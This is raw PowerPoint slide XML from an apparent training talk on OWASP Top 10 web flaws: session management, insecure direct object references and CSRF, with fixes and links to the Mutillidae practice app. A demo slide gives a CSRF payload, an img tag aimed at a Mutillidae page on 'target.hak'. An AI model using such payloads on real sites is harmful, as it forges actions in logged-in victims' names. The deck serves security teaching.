            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/966</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr 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Things too look out for</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The primary assets to protect are credentials and session IDs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>1. Are credentials always protected when stored using hashing or encryption? See A7.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>2. Can credentials be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>3. Are session IDs exposed in the URL (e.g., URL rewriting)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4. Are session IDs vulnerable to session fixation attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>5. Do session IDs timeout and can users log out?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>6. Are session IDs rotated after successful login?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>7. Are passwords, session IDs, and other credentials sent only over TLS connections? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="7620000" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The primary recommendation for an organization is to make available to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>developers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>A single set of strong authentication and session management controls. Such controls should strive to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a)   meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard(ASVS) areas V2 (Authentication) and V3 (Session Management).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	b)   have a simple interface for developers. Consider the ESAPI Authenticator and User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>APIsas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> good examples to emulate, use, or build upon.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2. Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs. </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A4 - Insecure Direct Object Reference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8153400" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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Demo Time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In the old version, you would have already seen it with the malicious file include demo. This time, let got look at the:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Source viewer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and in case you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST will save you</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Text file viewer</a:t>
            </a:r>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Fixes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Avoid exposing your private object references to users whenever possible, such as primary keys or filenames.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Validate any private object references extensively with an "accept known good" approach.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Verify authorization to all referenced objects.</a:t>
            </a:r>
            <a:endParaRPr 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A5 - Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1676400"/>
            <a:ext cx="8153400" cy="3539430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>	A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.</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dirty="0" smtClean="0"/>
              <a:t>CSRF/XSRF Illustration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\adrian\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8LADHGSQ\MCj04247900000[1].wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="1981200"/>
            <a:ext cx="1708150" cy="1778000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3" descr="C:\Users\adrian\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8LADHGSQ\MCj04247900000[1].wmf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2057400"/>
            <a:ext cx="1708150" cy="1778000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="1676400"/>
            <a:ext cx="1822102" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target Web App</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="C:\Users\adrian\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GDAW6AZK\MCj04414520000[1].png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="4114800"/>
            <a:ext cx="2743200" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="5867400"/>
            <a:ext cx="774571" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="1295400"/>
            <a:ext cx="1877437" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Website the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Up-Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19474834">
            <a:off x="4209743" y="3994585"/>
            <a:ext cx="508397" cy="2067742"/>
          </a:xfrm>
          <a:prstGeom prst="up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dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219200"/>
            <a:ext cx="2971800" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session established with web app via a cookie. (already logged in)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At some later point, content that the attacker controls is requested.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker serves up content that asks client’s browser to make a request.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client makes request, and since it already has a session cookie the request is honored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18651709">
            <a:off x="7274469" y="4288680"/>
            <a:ext cx="1676400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">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smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6604967">
            <a:off x="5760320" y="3532731"/>
            <a:ext cx="1676400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent4">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="vert270" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Right Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13489482">
            <a:off x="4413257" y="4182020"/>
            <a:ext cx="1676400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent4">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr vert="vert" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4</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what is this talk about?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.owasp.org/index.php/OWASP_Top_Ten_Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a side note, I’ve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>copied (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Ligatted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>quite of few of their descriptions and fixes into this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>presentation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Samurai WTF</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://samurai.inguardians.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ok, but what are those?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo Time!!!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="762000"/>
            <a:ext cx="8229600" cy="5546725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d prstMaterial="softEdge"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Let’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>visit a page with this lovely link:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>="http://target.hak/mutillidae/index.php?page=add-to-your-blog.php&amp;input_from_form=hi%20there%20monkeyboy"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>Don’t want to use a bad image? Try an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
